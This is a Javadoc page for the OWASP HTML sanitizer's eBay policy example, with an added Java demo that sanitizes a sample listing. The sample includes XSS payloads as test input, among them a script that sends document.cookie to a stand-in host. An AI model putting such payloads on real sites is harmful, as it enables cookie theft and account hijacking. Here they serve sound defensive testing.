Package org.owasp.html.examples
Class EbayPolicyExample
java.lang.Object
  org.owasp.html.examples.EbayPolicyExample
public class EbayPolicyExample extends Object
Based on the AntiSamy eBay example. eBay (http://www.ebay.com/) is the most popular online auction site in the universe, as far as I can tell. It is a public site, so anyone is allowed to post listings with rich HTML content. It is not surprising, given the attractiveness of eBay as a target, that it has been subject to a few complex XSS attacks. Listings are allowed to contain much richer content than, say, Slashdot, so its attack surface is considerably larger. The following tags appear to be accepted by eBay (they don't publish rules):
<a>, ...
Field Summary
  static PolicyFactory POLICY_DEFINITION
    A policy that can be used to produce policies that sanitize to HTML sinks via PolicyFactory.apply(org.owasp.html.HtmlStreamEventReceiver).

Constructor Summary
  EbayPolicyExample()

Method Summary
  static void main(String[] args)
    A test-bed that reads HTML from stdin and writes sanitized content to stdout.

Field Detail

POLICY_DEFINITION
public static final PolicyFactory POLICY_DEFINITION
A policy that can be used to produce policies that sanitize to HTML sinks via PolicyFactory.apply(org.owasp.html.HtmlStreamEventReceiver).
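The following is an added example, not code from this page or from the OWASP Java HTML Sanitizer project itself. It shows POLICY_DEFINITION used two ways: through the convenience PolicyFactory.sanitize(String) path, with an HtmlChangeListener reporting what the policy stripped, and through the PolicyFactory.apply(HtmlStreamEventReceiver) path that the field description refers to, which is also how the main test-bed wires the policy to an output stream. The class name EbayPolicyDemo and the sample listing are constructed for illustration; the example assumes the owasp-java-html-sanitizer library is on the classpath.

```java
import org.owasp.html.Handler;
import org.owasp.html.HtmlChangeListener;
import org.owasp.html.HtmlSanitizer;
import org.owasp.html.HtmlStreamRenderer;
import org.owasp.html.examples.EbayPolicyExample;

public class EbayPolicyDemo {

  // Constructed sample listing (not from the page): ordinary seller markup
  // mixed with the kinds of payloads a hostile listing would carry.
  static final String LISTING =
      "<p>Vintage <b>lens</b>, <a href=\"http://example.com/photos\">more photos</a></p>"
      + "<a href=\"javascript:alert(document.cookie)\">click</a>"
      + "<img src=\"x\" onerror=\"alert(1)\">"
      + "<script>fetch('//evil.invalid/?c=' + document.cookie)</script>"
      + "<div style=\"background:url(javascript:alert(2))\">styled</div>";

  /** Convenience path: the policy renders the sanitized result to a String. */
  static String sanitizeToString(String html) {
    return EbayPolicyExample.POLICY_DEFINITION.sanitize(html);
  }

  /** Same policy, but log every element and attribute the policy discarded.
   *  Useful when tuning a policy against real listings: the log shows what
   *  legitimate markup is being lost and what hostile markup was caught. */
  static String sanitizeAndReport(String html) {
    HtmlChangeListener<StringBuilder> listener = new HtmlChangeListener<StringBuilder>() {
      public void discardedTag(StringBuilder log, String elementName) {
        log.append("dropped element <").append(elementName).append(">\n");
      }
      public void discardedAttributes(StringBuilder log, String tagName, String... attributeNames) {
        log.append("dropped on <").append(tagName).append(">: ")
           .append(String.join(", ", attributeNames)).append('\n');
      }
    };
    StringBuilder log = new StringBuilder();
    String clean = EbayPolicyExample.POLICY_DEFINITION.sanitize(html, listener, log);
    System.err.print(log);
    return clean;
  }

  /** Streaming path: apply() binds the policy to an HtmlStreamEventReceiver.
   *  Here the receiver is a renderer writing into a StringBuilder; the main
   *  test-bed on this page does the same thing with System.out as the sink. */
  static String sanitizeStreaming(String html) {
    StringBuilder out = new StringBuilder();
    HtmlStreamRenderer renderer = HtmlStreamRenderer.create(out, Handler.DO_NOTHING);
    HtmlSanitizer.sanitize(html, EbayPolicyExample.POLICY_DEFINITION.apply(renderer));
    return out.toString();
  }

  public static void main(String[] args) {
    System.out.println(sanitizeToString(LISTING));
    System.out.println(sanitizeAndReport(LISTING));
    System.out.println(sanitizeStreaming(LISTING));
  }
}
```

The sanitized string is safe only as HTML body content, which is what the policy targets; placing it inside an attribute value, a <script> block or a URL is a different sink and needs different encoding. Since eBay does not publish its rules, the allowed tag list above is observed rather than authoritative, so re-check a policy like this against current browser behaviour before relying on it for user-supplied markup.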

Method Detail

main
public static void main(String[] args) throws IOException
A test-bed that reads HTML from stdin and writes sanitized content to stdout.
Throws:
  IOException